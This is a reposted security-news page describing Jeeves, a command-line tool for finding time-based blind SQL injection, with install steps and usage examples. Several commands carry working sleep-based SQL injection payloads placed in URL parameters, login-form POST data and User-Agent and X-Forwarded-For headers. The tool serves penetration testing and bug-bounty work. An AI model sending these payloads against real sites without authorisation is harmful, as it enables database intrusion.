Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Jeeves - Time-Based Blind SQLInjection Finder

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Jeeves - Time-Based Blind SQLInjection Finder


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: kitploit.com


Jeeves is made for looking to Time-Based Blind SQLInjection through recon.


- Installation & Requirements:

Installing Jeeves

๏’€
$ go install github.com/ferreiraklet/Jeeves@latest

OR

$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Usage & Explanation:

In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1

Single urls

echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time you must use the time mentioned in payload


From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! Must be the same =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Using proxy

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Headers =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! ->

echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Another ways of Usage

You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght


Command line flags:

traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message">
 Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message

Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testing in headers

echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

  • Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"
  • Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )

This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.

Please, also check these =>

Nilo - Checks if URL has status 200

SQLMAP

Blisqy Header time based SQLI



...



๐Ÿ“Œ Explaining a simple buffer overflow using the Jeeves pwn challenge from Hack The Box!


๐Ÿ“ˆ 31.83 Punkte

๐Ÿ“Œ Why MapQuest, Jeeves, and Other 'Internet Zombies' are Still Around


๐Ÿ“ˆ 31.83 Punkte

๐Ÿ“Œ WAN IT LTD - SQLInjection / XSS / JSDeface


๐Ÿ“ˆ 29.87 Punkte

๐Ÿ“Œ Powered by: SYSCOM Technologies S.A.R.L SqlInjection


๐Ÿ“ˆ 29.87 Punkte

๐Ÿ“Œ CEPCO Management SqlInjection Vulnerability


๐Ÿ“ˆ 29.87 Punkte

๐Ÿ“Œ StartPoligraf SQLInjection


๐Ÿ“ˆ 29.87 Punkte

๐Ÿ“Œ WiFi Finder, a Popular Hotspot Finder App, Exposed 2 Million Wi-Fi Network Passwords


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ WiFi Finder, a Popular Hotspot Finder App, Exposed 2 Million Wi-Fi Network Passwords


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Okadminfinder3 - Admin Panel Finder / Admin Login Page Finder


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ OKadminFinder - Admin Panel Finder / Admin Login Page Finder


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Finder Windows 1.5.2 - Access macOS Finder windows easily.


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Duplicate File Finder Remover 7.0.5 - Professional duplicate finder and cleaner.


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Path Finder 2151 - Powerful, award-winning Finder alternative.


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Neuauflage im Prozess gegen "Barbarenschatz"-Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Kein Happy End für Barbarenschatz-Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ "Sparklegate" legt Finder-Bug offen


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Twitter zahlt 322.000 Dollar an Finder von Sicherheitslรผcken


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Pokémon GO: Fußabdrücke, Pokéfinder & Energiesparmodus weg, Profile jetzt hübscher


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Tile Slim ausprobiert: Der Bluetooth-Dinge-Finder, der dรผnn genug fรผrs Portemonnaie ist


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Erneuter Hack der Sexbรถrse Adult Friend Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Pompem – Exploit & Vulnerability Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Erneuter Hack der Sexbรถrse Adult Friend Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Erneuter Hack der Sexbรถrse Adult Friend Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Adult Friend Finder: 412 Milionen Accounts von Datingseite gehackt


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Adult Friend Finder: 412 Milionen Accounts von Datingseite gehackt


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Kontaktbรถrse Adult Friend Finder: Hack betrifft รผber 400 Millionen Nutzer


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Kontaktbรถrse Adult Friend Finder: Hack betrifft รผber 400 Millionen Nutzer


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Das Feature, das alle vermissen: Google Maps erhรคlt Toiletten-Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Finder for AirPods: Apple entfernt App zur Kopfhรถrer-Suche


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Neuauflage im Prozess gegen "Barbarenschatz"-Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Kein Happy End für Barbarenschatz-Finder


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ "Sparklegate" legt Finder-Bug offen


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Twitter zahlt 322.000 Dollar an Finder von Sicherheitslรผcken


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Pokémon GO: Fußabdrücke, Pokéfinder & Energiesparmodus weg, Profile jetzt hübscher


๐Ÿ“ˆ 13.93 Punkte

๐Ÿ“Œ Tile Slim ausprobiert: Der Bluetooth-Dinge-Finder, der dรผnn genug fรผrs Portemonnaie ist


๐Ÿ“ˆ 13.93 Punkte











matomo